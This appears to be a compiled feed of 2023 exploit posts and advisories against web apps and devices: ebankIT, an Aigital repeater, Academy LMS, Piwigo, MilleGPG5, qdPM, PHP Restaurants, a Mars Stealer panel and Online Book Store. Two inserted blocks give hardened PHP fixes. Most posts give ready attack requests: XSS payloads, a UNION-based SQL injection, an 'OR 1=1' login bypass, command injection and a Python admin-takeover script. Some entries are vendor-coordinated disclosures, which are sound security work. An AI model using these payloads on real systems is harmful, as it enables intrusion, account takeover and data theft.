<pre><code>CVE-2023-30454<br /><br />[Description]<br />An issue was discovered in ebankIT before version 7.<br />Document Object Model based XSS exists within the<br />/Security/Transactions/Transactions.aspx<br />endpoint. Users can supply their own JavaScript within the<br />ctl100$ctl00MainContent$TransactionMainContent$accControl$hdnAccountsArray<br />POST parameter that will be passed to an eval() function and executed<br />upon pressing the continue button.<br /><br />------------------------------------------<br /><br />[Vulnerability Type]<br />Cross Site Scripting (XSS)<br /><br />------------------------------------------<br /><br />[Vendor of Product]<br />ebankIT<br /><br />------------------------------------------<br /><br />[Affected Product Code Base]<br />ebankIT - Omnichannel Digital Banking Platform - Version 6, patched in version 7<br /><br />------------------------------------------<br /><br />[Affected Component]<br />The endpoint existing at: /Security/Transactions/Transactions.aspx<br /><br />------------------------------------------<br /><br />[Attack Type]<br />Remote<br /><br />------------------------------------------<br /><br />[Impact Code execution]<br />true<br /><br />------------------------------------------<br /><br />[Attack Vectors]<br />I discovered a Document Object Model-based Cross-Site Scripting issue<br />within the ebankIT platform. While manually inspecting the client-side<br />JavaScript code I came across the variable JSONText. This variable<br />was using the eval function to parse data passed to it through the<br />accobj variable. Knowing the eval function evaluates text as<br />JavaScript, I proceeded to locate exactly what data was passed to this<br />variable. I found that the data could be supplied by a user during a<br />Transfer request (on /Security/Transactions/Transactions.aspx), when<br />selecting which account to transfer from. 
To execute this XSS, I<br />intercepted our test user's Transfer request, supplied my own custom<br />JavaScript alert(4) in the<br />ctl100$ctl00MainContent$TransactionMainContent$accControl$hdnAccountsArray<br />POST parameter, and pressed the continue button, which resulted in<br />the payload successfully executing.<br /><br />------------------------------------------<br /><br />[Discoverer]<br />Jake Murphy<br /></code></pre>
<pre><code># Exploit Title: Aigital Wireless-N Repeater - Command Injection<br /># Exploit Author: Matteo Mandolini<br /># Date : 13/04/2023<br /># Vendor Homepage: https://web.archive.org/web/20220625053314/https://www.aigital.com/<br /># Version: Mini_Router.0.131229<br /><br />Command Injection<br /><br />POST /boafrm/formSysCmd HTTP/1.1<br />Host: 192.168.10.253<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 31<br />Origin: http://192.168.10.253<br />Connection: close<br />Referer: http://192.168.10.253/setok.htm<br />Upgrade-Insecure-Requests: 1<br /><br />sysCmd=ping+-c10+192.168.10.101<br /><br /><br /><br /><br /><br /></code></pre>
<pre><code>┌───────────────────────────────────────────────────────────────────────────────────────┐<br />│ C r a C k E r │<br />│ T H E C R A C K O F E T E R N A L M I G H T │<br />└───────────────────────────────────────────────────────────────────────────────────────┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌───────────────────────────────────────────────────────────────────────────────────────┐<br />│ [ Exploits ] │<br />└───────────────────────────────────────────────────────────────────────────────────────┘<br />│ Author : CraCkEr │<br />│ Website : creativeitem.com │<br />│ Vendor : CreativeItem │<br />│ Software : CreativeItem - Academy Learning Management System 5.14 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />├───────────────────────────────────────────────────────────────────────────────────────┤<br />│ │<br />└───────────────────────────────────────────────────────────────────────────────────────┘<br />│ │<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials. │<br />│ │<br />┌───────────────────────────────────────────────────────────────────────────────────────┐<br />│ │<br />└───────────────────────────────────────────────────────────────────────────────────────┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌───────────────────────────────────────────────────────────────────────────────────────┐<br />│ © CraCkEr 2023 │<br />└───────────────────────────────────────────────────────────────────────────────────────┘<br /><br /><br />GET parameter 'sort_by' is vulnerable to RXSS<br /><br />Path: /academy/home/courses<br /><br />https://demo.creativeitem.com/academy/home/courses?category=photoshop&price=paid&level=beginner&language=arabic&rating=2&sort_by=newestbezzi%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebrmil<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>=====[ Tempest Security Intelligence - ADV-03/2023 ]==========================<br /><br />Piwigo - Version 13.5.0<br /><br />Author: Rodolfo Tavares<br /><br />Tempest Security Intelligence - Recife, Pernambuco - Brazil<br /><br />=====[ Table of Contents ]==================================================<br /> * Overview<br /> * Detailed description<br /> * Timeline of disclosure<br /> * Thanks & Acknowledgments<br /> * References<br /><br />=====[ Vulnerability Information ]=============================================<br /> * Class: Improper Neutralization of Special Elements used in an SQL Command<br />('SQL Injection') [CWE-89]<br /> * CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br /> * CVE-2023-26876<br /><br />=====[ Overview ]========================================================<br /> * System affected : Piwigo - Version 13.5.0<br /> * Software Version : Version 13.5.0 (other versions may also be affected).<br /> * Impact : Piwigo 13.5.0 is vulnerable to SQL injection via the<br />filter_user_id parameter of the<br />admin.php?page=history&filter_image_id=&filter_user_id endpoint. An<br />attacker can exploit this by<br />executing SQL injection code to retrieve sensitive (P1) information and<br />perform unintended actions.<br /><br />=====[ Detailed description ]=================================================<br /><br />An authenticated user could run SQLi commands in the application and<br />retrieve sensitive information (P1) and database information using the<br />endpoint<br />http://localhost/admin.php?page=history&filter_image_id=&filter_user_id. 
To<br />explore, just execute the following request:<br /><br />GET<br />/piwigo/admin.php?page=history&filter_image_id=v3cna&filder_user_id=1%20UNION%20ALL%20SELECT<br />%20CONCAT(0x4141414141,IFNULL(CAST(VERSION()%20AS%20NCHAR),0x20),0x4141414141)--%20--<br />HTTP/1.1<br />Host: localhost<br />Cookie: pwg_id=cookies<br /><br />Check the value contained in the *filter_image_id* variable in the request<br />response.<br /><br /><br />=====[ Timeline of disclosure ]===============================================<br /><br />12/Feb/2023 - Responsible disclosure was initiated with the vendor.<br /><br />17/Feb/2023 - Piwigo confirmed the issue.<br /><br />08/Mar/2023 - CVE-2023-26876 was assigned and reserved.<br /><br />09/Mar/2023 - The vendor fixed the SQL injection vulnerability.<br /><br />=====[ Thanks & Acknowledgments ]========================================<br /><br /> * fxo, ravs<br /> * Henrique Arcoverde < henrique.arcoverde () tempest.com.br ><br /> * Tempest Security Intelligence / Tempest's Pentest Team [3]<br /><br />=====[ References ]=====================================================<br /><br />[1] https://cwe.mitre.org/data/definitions/89.html<br /><br />[2] https://github.com/Piwigo/Piwigo/issues/1876<br /><br />[3] https://www.tempest.com.br/<br /><br />[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26876<br /><br />=====[ EOF ]===========================================================<br /><br /></code></pre>
<pre><code># Exploit Title: Aigital Wireless-N Repeater - Stored Cross-Site Scripting<br /># Exploit Author: Matteo Mandolini<br /># Date : 13/04/2023<br /># Vendor Homepage: https://web.archive.org/web/20220625053314/https://www.aigital.com/<br /># Version: Mini_Router.0.131229<br /><br />XSS Stored<br /><br /><br />POST /boafrm/formHomeWlanSetup HTTP/1.1<br />Host: 192.168.10.253<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 265<br />Origin: http://192.168.10.253<br />Connection: close<br />Referer: http://192.168.10.253/home.htm<br />Upgrade-Insecure-Requests: 1<br /><br />submit-url=&submit-value=&wl_onoff=0&wps_clear_configure_by_reg=0&wl_ssid=<script>alert("XSS")</script>&wl_mode=0&wl_channel=0&wl_Method=4&wl_authType=auto&wepEnabled=ON&weplength=&wepformat=&wl_wpaAuth=psk&wl_pskFormat=0&ciphersuite=aes&wpa2ciphersuite=aes&wl_pskValue=12345678&dhcp=0<br /><br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control<br /># Date: 2023-04-28<br /># Exploit Author: Andrea Intilangelo<br /># Vendor Homepage: https://millegpg.it/<br /># Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/<br /># Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe<br /># Version: 5.9.2<br /># Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913<br /># CVE: CVE-2023-25438<br /><br />MilleGPG / MilleGPG5, also known as "Governo Clinico 3"<br /><br />Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l.<br /><br />Affected/tested version: MilleGPG5 5.9.2<br /><br />Summary:<br />Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through the<br />Italian general practice network.<br />MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes,<br />complete with new features for the management of the COVID-19 vaccine campaign. It is an irreplaceable "ally" for the<br />General Practitioner, also offering contextual access to the most authoritative scientific content and CME training.<br /><br />Vuln desc:<br />The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing some<br />files to be modified by unprivileged users, malicious processes and/or threat actors. 
An attacker can exploit the weakness by<br />abusing the "write" permission on the main application, which is available to all users on the system or network.<br /><br /><br />Details:<br />Any low-privileged user can elevate their privileges by abusing files/folders that have incorrect permissions, e.g.:<br /><br />C:\Program Files\MilleGPG5\MilleGPG5.exe (main GUI application)<br />C:\Program Files\MilleGPG5\plugin\ (GPGCommand.exe, nginx and php files)<br />C:\Program Files\MilleGPG5\k-platform\ (api and webapp files)<br /><br />with permissions such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA<br /><br /><br /></code></pre>
<pre><code># Exploit Title: qdPM 9.x -[bind_type] - Cross-Site Scripting<br /># Exploit Author: Or4nG.M4n<br /># Date : 4/26/2023<br /># Vendor Homepage: https://qdpm.net/<br /># Software Link: https://sourceforge.net/projects/qdpm/files/latest/download<br /># Version: 9.2 , 9.1<br /><br />Reflected XSS.<br /><br />GET http://localhost/qdpm/index.php/extraFields?bind_type=<script>alert(OR4NG)</script> HTTP/1.1<br />Host: localhost<br />User-Agent: Safari/89.0 <br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: ar,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Connection: keep-alive<br />Cookie: skin=ColorNature; sidebar_closed=ls -al; qdPM8=rfjniks7j5mkaur7vcliou18bd<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: none<br />Sec-Fetch-User: ?1<br /></code></pre>
<pre><code># Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting<br /># Google Dork: None<br /># Date: 4/26/2023<br /># Exploit Author: Or4nG.M4n<br /># Vendor Homepage: https://github.com/jcwebhole<br /># Software Link: https://github.com/jcwebhole/php_restaurants<br /># Version: 1.0<br /><br /><br />functions.php<br /><br />function login(){<br />global $conn;<br />$email = $_POST['email'];<br />$pw = $_POST['password'];<br /><br />$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` = '".md5($pw)."'"; <-- there is no filtering of the email/password parameters before they are placed in the SQL query<br />$result = $conn->query($sql);<br />if ($result->num_rows > 0) {<br />while($row = $result->fetch_assoc()) {<br />setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day<br />header('location: index.php');<br />}<br />} else {<br />header('location: login.php?m=Wrong Password');<br />}<br /><br />}<br /><br />login bypass at admin page /rest1/admin/login.php<br /><br />email & password : ' OR 1=1 -- <-- add a [space] at the end of the payload<br /><br />cross site scripting on main page /index.php<br /><br />xhttp.open("GET", "functions.php?f=getRestaurants<?php<br /> if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we<br />can insert our XSS payload<br />?><br /> ", true);<br />xhttp.send();<br /><br /></script> <-- when you insert your payload, don't forget to add </script>,<br />like:<br /><br />xss payload : </script><img onerror=alert(1) src=a><br /></code></pre>
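A hardened form of the index.php snippet in the post above, added here as an example and not code from php_restaurants: the search term is percent-encoded before it enters the query string, and the whole URL is JSON-encoded with hex escapes before it enters the script, so a value such as the quoted </script> payload cannot leave the JavaScript string literal.

```php
<?php
// Added example, not code from php_restaurants. The vulnerable index.php
// echoes $_GET['search'] straight into a <script> block, so "</script>"
// in the value ends the script and the remainder is parsed as HTML.

// Build the XHR target. The search term is percent-encoded so it is one
// query parameter and cannot smuggle "&" or "</script>" into the URL.
function buildSearchUrl(array $get): string
{
    $url = 'functions.php?f=getRestaurants';
    if (isset($get['search']) && is_string($get['search'])) {
        $url .= '&search=' . rawurlencode($get['search']);
    }
    return $url;
}

// Emit the script. json_encode() yields a valid JS string literal, and the
// JSON_HEX_* flags turn <, >, &, ' and " into \uXXXX escapes, so even a
// value that slipped past rawurlencode() could not close the <script>
// element or break out of the literal (defence in depth).
function renderSearchScript(array $get): string
{
    $js = json_encode(
        buildSearchUrl($get),
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
    return "<script>\n"
        . "var xhttp = new XMLHttpRequest();\n"
        . "xhttp.open(\"GET\", " . $js . ", true);\n"
        . "xhttp.send();\n"
        . "</script>\n";
}

// Constructed input: the payload quoted in the post above. The output holds
// no raw "<" or "</script>", only "%3C%2Fscript%3E..." inside a JS string,
// and functions.php still receives the original text via $_GET['search'].
echo renderSearchScript(['search' => '</script><img onerror=alert(1) src=a>']);
```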
<pre><code># Exploit Title: Mars Stealer 8.3 - Admin Account Takeover<br /># Product: Mars Stealer<br /># Technology: PHP<br /># Version: < 8.3<br /># Google Dork: N/A<br /># Date: 20.04.2023<br /># Tested on: Linux <br /># Author: Sköll - twitter.com/s_k_o_l_l<br /><br /><br />import argparse<br />import requests<br /><br />parser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit')<br />parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/')<br />args = parser.parse_args()<br /><br />url = args.url.rstrip('/') + '/includes/settingsactions.php'<br />headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Sköll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"}<br />data = {"func": "savepwd", "pwd": "sköll"} #change password<br />response = requests.post(url, headers=headers, data=data)<br /><br />if response.status_code == 200:<br /> print("Successful!")<br /> print("New Password: " + data["pwd"])<br />else:<br /> print("Exploit Failed!")<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Online Book Store 1.0 - (process.php) SQL injection<br /># Date: 4/26/2023<br /># Exploit Author: Or4nG.M4n<br /># Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/<br /># Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip<br /># Version: 1.0<br /><br />* STEPS *<br />1- go to any book and add it to the cart<br />2- after that you will be redirected to /cart.php<br />3- click on Go To Checkout /checkout.php<br />4- inject your injection code into any of these POST parameters<br /><br />parameters : name address city zip_code country<br /><br /><br /> foreach($_SESSION['cart'] as $isbn => $qty){<br /> $bookprice = getbookprice($isbn);<br /> $query = "INSERT INTO order_items VALUES <====== 1<br /> ('$orderid', '$isbn', '$bookprice', '$qty')"; <====== 2<br /> $result = mysqli_query($conn, $query); <====== 3<br /> if(!$result){<br /> echo "Insert value false!" . mysqli_error($conn2); <====== 4<br /> exit;<br /> }<br /> }<br /></code></pre>
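A prepared-statement version of both the php_restaurants login() shown in the earlier post and the order_items loop from the Online Book Store post, added here as an example rather than code from either project. It assumes mysqli with mysqlnd (for get_result()) and the getbookprice() helper that appears in the post.

```php
<?php
// Added example, not code from php_restaurants or online-book-store.
// Both vulnerable snippets concatenate request data into the SQL text.
// With mysqli prepared statements the query text is sent first and the
// values are bound separately, so "' OR 1=1 -- " is compared as a plain
// string and can never rewrite the WHERE clause.

// php_restaurants functions.php: login() without string concatenation.
function login(mysqli $conn): void
{
    $email = $_POST['email'] ?? '';
    $pw    = $_POST['password'] ?? '';
    if (!is_string($email) || !is_string($pw)) {
        header('Location: login.php?m=Wrong Password');
        exit;
    }
    // md5() is kept only to match the hashes the application already
    // stores; password_hash()/password_verify() should replace it once
    // the stored hashes are migrated.
    $hash = md5($pw);
    $stmt = $conn->prepare(
        'SELECT `id` FROM `users` WHERE `email` = ? AND `password` = ?'
    );
    $stmt->bind_param('ss', $email, $hash);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if ($row === null) {
        header('Location: login.php?m=Wrong Password');
        exit;
    }
    setcookie('uid', (string) $row['id'], time() + 86400 * 30, '/');
    header('Location: index.php');
    exit;
}

// online-book-store checkout: the order_items loop with bound values.
// getbookprice() is the application's own helper from the post; the
// checkout fields (name, address, city, zip_code, country) must be bound
// the same way wherever they are inserted.
function insertOrderItems(mysqli $conn, int $orderid, array $cart): void
{
    $stmt = $conn->prepare('INSERT INTO order_items VALUES (?, ?, ?, ?)');
    foreach ($cart as $isbn => $qty) {
        $isbn      = (string) $isbn;
        $qty       = (int) $qty;
        $bookprice = (float) getbookprice($isbn);
        $stmt->bind_param('isdi', $orderid, $isbn, $bookprice, $qty);
        if (!$stmt->execute()) {
            error_log('order_items insert failed: ' . $stmt->error);
            exit('Insert value false!');
        }
    }
    $stmt->close();
}
```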